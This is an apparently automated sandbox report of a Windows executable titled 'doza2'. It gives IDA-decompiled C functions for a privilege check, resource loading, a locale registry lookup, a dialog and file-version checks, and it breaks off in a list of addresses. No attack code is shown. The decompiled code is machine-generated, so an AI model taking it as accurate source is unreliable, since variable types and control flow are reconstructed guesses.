                                                                                                                                                                                                                                      • Part of subcall function 004017EE: AllocateAndInitializeSid.ADVAPI32(004018DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,004018DD), ref: 00401855
                                                                                                                                                                                                                                      • Part of subcall function 004017EE: FreeSid.ADVAPI32(?,?,?,?,004018DD), ref: 00401883
                                                                                                                                                                                                                                      • Part of subcall function 004017EE: FreeLibrary.KERNEL32(00000000,?,?,?,004018DD), ref: 0040188A
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 004018EB
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004018F2
                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0040190A
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00401918
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,?,?), ref: 0040192C
                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00401944
                                                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401964
                                                                                                                                                                                                                                    • EqualSid.ADVAPI32(00000004,?), ref: 0040197A
                                                                                                                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 0040199C
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 004019A3
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004019AD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2168512254-0
                                                                                                                                                                                                                                    • Opcode ID: 301c52f797cbd35a8e8b94abf9be9750f60c30641f2852762fecb15bbadc3fda
                                                                                                                                                                                                                                    • Instruction ID: 25d17cb087145c015d5063b66ab4b84c81c4c11853c483eeef0c9c8ad6c8a379
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 301c52f797cbd35a8e8b94abf9be9750f60c30641f2852762fecb15bbadc3fda
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F312DB1A00209AFDB109FA5DD98AAFBBBCFF48704F50043AE545F61A0D7389915CB69
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E0040468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}








                                                                                                                                                                                                                                    0x00404699
                                                                                                                                                                                                                                    0x0040469b
                                                                                                                                                                                                                                    0x004046a9
                                                                                                                                                                                                                                    0x004046af
                                                                                                                                                                                                                                    0x004046b4
                                                                                                                                                                                                                                    0x004046bc
                                                                                                                                                                                                                                    0x004046f9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004046f9
                                                                                                                                                                                                                                    0x004046d9
                                                                                                                                                                                                                                    0x004046dd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004046e5
                                                                                                                                                                                                                                    0x004046ef
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004046f5
                                                                                                                                                                                                                                    0x004046ff

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
                                                                                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
                                                                                                                                                                                                                                    • memcpy_s.MSVCRT ref: 004046E5
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                    • String ID: TITLE$doza2
                                                                                                                                                                                                                                    • API String ID: 3370778649-4167907646
                                                                                                                                                                                                                                    • Opcode ID: 735a035723e9c89e979ff7554535d7cc5c2412197345818d6819b7f6aae81ff3
                                                                                                                                                                                                                                    • Instruction ID: 79f0873ee19441588a253031faa3d29a4edaeb9cce06827ffb284520bab3e3ef
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 735a035723e9c89e979ff7554535d7cc5c2412197345818d6819b7f6aae81ff3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B801F9722403047BE3101BA59D0CF2B3E2CDBC6F51F044435FB49B7280D9B6886192BE
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040681F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 81registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E0040681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x408004; // 0x8f135e3b
				_v8 = _t19 ^ _t44;
				_t41 =  *0x4081d8; // 0x0
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x4081d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x4081d8; // 0x0
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x401140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E004066F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x4081d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				_t18 =  &_v8; // 0x40463b
				return E00406CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
			}


















                                                                                                                                                                                                                                    0x0040681f
                                                                                                                                                                                                                                    0x0040682a
                                                                                                                                                                                                                                    0x00406831
                                                                                                                                                                                                                                    0x00406836
                                                                                                                                                                                                                                    0x0040683c
                                                                                                                                                                                                                                    0x0040683e
                                                                                                                                                                                                                                    0x00406848
                                                                                                                                                                                                                                    0x00406851
                                                                                                                                                                                                                                    0x0040685d
                                                                                                                                                                                                                                    0x00406864
                                                                                                                                                                                                                                    0x00406876
                                                                                                                                                                                                                                    0x0040693a
                                                                                                                                                                                                                                    0x0040693a
                                                                                                                                                                                                                                    0x0040687c
                                                                                                                                                                                                                                    0x0040687e
                                                                                                                                                                                                                                    0x00406885
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004068d6
                                                                                                                                                                                                                                    0x004068f4
                                                                                                                                                                                                                                    0x00406900
                                                                                                                                                                                                                                    0x00406902
                                                                                                                                                                                                                                    0x0040690a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040690c
                                                                                                                                                                                                                                    0x0040690c
                                                                                                                                                                                                                                    0x0040691c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040691e
                                                                                                                                                                                                                                    0x00406924
                                                                                                                                                                                                                                    0x0040692b
                                                                                                                                                                                                                                    0x00406932
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040692b
                                                                                                                                                                                                                                    0x0040691c
                                                                                                                                                                                                                                    0x0040690a
                                                                                                                                                                                                                                    0x00406885
                                                                                                                                                                                                                                    0x00406876
                                                                                                                                                                                                                                    0x00406940
                                                                                                                                                                                                                                    0x00406951

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0040686E
                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004A), ref: 004068A7
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 004068CC
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,?,0000000C), ref: 004068F4
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00406902
                                                                                                                                                                                                                                      • Part of subcall function 004066F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0040691A), ref: 00406741
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                    • String ID: ;F@$Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                    • API String ID: 3346862599-4093955092
                                                                                                                                                                                                                                    • Opcode ID: 34cef6a5a546b334fac7b65d37dafabe7fca2f16954090be01d47ee25951021f
                                                                                                                                                                                                                                    • Instruction ID: e57de408b3f85bc4f8b92cc567276c2474f6d04b58f3ec5ba2619b9cb5330980
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34cef6a5a546b334fac7b65d37dafabe7fca2f16954090be01d47ee25951021f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14318471A003289FDB21CF15CD44BAB7778EF45718F0101BAE98AB6290DB349D95CF5A
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00403450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00403450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E004043D0(_t24, _t12);
					SetWindowTextA(_t24, "doza2");
					SetDlgItemTextA(_t24, 0x838,  *0x409404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x4091dc = 1;
					goto L8;
				}
				return 0;
			}








                                                                                                                                                                                                                                    0x00403459
                                                                                                                                                                                                                                    0x0040345c
                                                                                                                                                                                                                                    0x004034d8
                                                                                                                                                                                                                                    0x004034de
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004034e0
                                                                                                                                                                                                                                    0x0040345e
                                                                                                                                                                                                                                    0x00403463
                                                                                                                                                                                                                                    0x0040349a
                                                                                                                                                                                                                                    0x004034a0
                                                                                                                                                                                                                                    0x004034a7
                                                                                                                                                                                                                                    0x004034b2
                                                                                                                                                                                                                                    0x004034c4
                                                                                                                                                                                                                                    0x004034cb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004034cb
                                                                                                                                                                                                                                    0x00403468
                                                                                                                                                                                                                                    0x0040346e
                                                                                                                                                                                                                                    0x00403474
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040347c
                                                                                                                                                                                                                                    0x0040348c
                                                                                                                                                                                                                                    0x00403490
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403496
                                                                                                                                                                                                                                    0x00403484
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403486
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403486
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00403490
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0040349A
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 004034B2
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000838), ref: 004034C4
                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 004034CB
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 004034D8
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                    • String ID: doza2
                                                                                                                                                                                                                                    • API String ID: 852535152-612509477
                                                                                                                                                                                                                                    • Opcode ID: d838905dce34ad587255487376907b35c9843f6154121b09490ee186a64799e7
                                                                                                                                                                                                                                    • Instruction ID: 9f86eaeb99706c3d809457defbd2d1e2bf9a223c622526840d8ada4286a6712c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d838905dce34ad587255487376907b35c9843f6154121b09490ee186a64799e7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4601B131240214ABD7165F65DE0C96E3E68EB49702F104036FA46BE6E1CB789F52DB8E
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00402AAC Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                    			E00402AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x408004; // 0x8f135e3b
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x409a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00401680(_t65, E004017C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E004065E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00401680(_t65, E004017C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00406CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}






















                                                                                                                                                                                                                                    0x00402aac
                                                                                                                                                                                                                                    0x00402ab7
                                                                                                                                                                                                                                    0x00402abc
                                                                                                                                                                                                                                    0x00402abe
                                                                                                                                                                                                                                    0x00402ac3
                                                                                                                                                                                                                                    0x00402ac6
                                                                                                                                                                                                                                    0x00402ac9
                                                                                                                                                                                                                                    0x00402ace
                                                                                                                                                                                                                                    0x00402ae6
                                                                                                                                                                                                                                    0x00402bdc
                                                                                                                                                                                                                                    0x00402bdc
                                                                                                                                                                                                                                    0x00402be0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402af2
                                                                                                                                                                                                                                    0x00402afc
                                                                                                                                                                                                                                    0x00402b00
                                                                                                                                                                                                                                    0x00402b05
                                                                                                                                                                                                                                    0x00402b05
                                                                                                                                                                                                                                    0x00402b0b
                                                                                                                                                                                                                                    0x00402bca
                                                                                                                                                                                                                                    0x00402bd1
                                                                                                                                                                                                                                    0x00402b11
                                                                                                                                                                                                                                    0x00402b18
                                                                                                                                                                                                                                    0x00402b26
                                                                                                                                                                                                                                    0x00402b99
                                                                                                                                                                                                                                    0x00402bc8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402b9b
                                                                                                                                                                                                                                    0x00402bae
                                                                                                                                                                                                                                    0x00402bb3
                                                                                                                                                                                                                                    0x00402bb5
                                                                                                                                                                                                                                    0x00402bb5
                                                                                                                                                                                                                                    0x00402bb8
                                                                                                                                                                                                                                    0x00402bb8
                                                                                                                                                                                                                                    0x00402bba
                                                                                                                                                                                                                                    0x00402bbb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402bb8
                                                                                                                                                                                                                                    0x00402b28
                                                                                                                                                                                                                                    0x00402b2e
                                                                                                                                                                                                                                    0x00402b33
                                                                                                                                                                                                                                    0x00402b39
                                                                                                                                                                                                                                    0x00402b3c
                                                                                                                                                                                                                                    0x00402b3c
                                                                                                                                                                                                                                    0x00402b3e
                                                                                                                                                                                                                                    0x00402b3f
                                                                                                                                                                                                                                    0x00402b55
                                                                                                                                                                                                                                    0x00402b5d
                                                                                                                                                                                                                                    0x00402b64
                                                                                                                                                                                                                                    0x00402b64
                                                                                                                                                                                                                                    0x00402b7a
                                                                                                                                                                                                                                    0x00402b7f
                                                                                                                                                                                                                                    0x00402b81
                                                                                                                                                                                                                                    0x00402b81
                                                                                                                                                                                                                                    0x00402b84
                                                                                                                                                                                                                                    0x00402b84
                                                                                                                                                                                                                                    0x00402b86
                                                                                                                                                                                                                                    0x00402b87
                                                                                                                                                                                                                                    0x00402bbf
                                                                                                                                                                                                                                    0x00402bc1
                                                                                                                                                                                                                                    0x00402bc1
                                                                                                                                                                                                                                    0x00402b26
                                                                                                                                                                                                                                    0x00402bda
                                                                                                                                                                                                                                    0x00402bda
                                                                                                                                                                                                                                    0x00402be6
                                                                                                                                                                                                                                    0x00402be6
                                                                                                                                                                                                                                    0x00402bf8

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00402AE6
                                                                                                                                                                                                                                    • IsDBCSLeadByte.KERNEL32(00000000), ref: 00402AF2
                                                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00402B12
                                                                                                                                                                                                                                    • CharUpperA.USER32 ref: 00402B1E
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,?), ref: 00402B55
                                                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00402BD4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 571164536-0
                                                                                                                                                                                                                                    • Opcode ID: 9ef7d4785946137a81a6c4d03daffc9e4a49267f720d8b09bbae1a799264634a
                                                                                                                                                                                                                                    • Instruction ID: 708e6bc04abe071344f259b5c123e55e43d0c35eeaa9831848c96a395a22173b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ef7d4785946137a81a6c4d03daffc9e4a49267f720d8b09bbae1a799264634a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 144102345042855FDB159F308D08ABE7BB99F56304F1400BBE8C2A72C2DAB95E46CB99
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004028E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E004028E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				char _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00402773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t11 =  &_v32; // 0x403938
						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									_t16 =  &_v32; // 0x403938
									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00402A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00402A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

































                                                                                                                                                                                                                                    0x004028f1
                                                                                                                                                                                                                                    0x004028f4
                                                                                                                                                                                                                                    0x004028f7
                                                                                                                                                                                                                                    0x004028f9
                                                                                                                                                                                                                                    0x004028fc
                                                                                                                                                                                                                                    0x004028ff
                                                                                                                                                                                                                                    0x00402901
                                                                                                                                                                                                                                    0x00402907
                                                                                                                                                                                                                                    0x00402a62
                                                                                                                                                                                                                                    0x00402a64
                                                                                                                                                                                                                                    0x0040290d
                                                                                                                                                                                                                                    0x0040290d
                                                                                                                                                                                                                                    0x0040290f
                                                                                                                                                                                                                                    0x00402912
                                                                                                                                                                                                                                    0x00402920
                                                                                                                                                                                                                                    0x00402937
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040293d
                                                                                                                                                                                                                                    0x00402944
                                                                                                                                                                                                                                    0x0040294a
                                                                                                                                                                                                                                    0x0040294f
                                                                                                                                                                                                                                    0x00402a2f
                                                                                                                                                                                                                                    0x00402a32
                                                                                                                                                                                                                                    0x00402a34
                                                                                                                                                                                                                                    0x00402a37
                                                                                                                                                                                                                                    0x00402a41
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
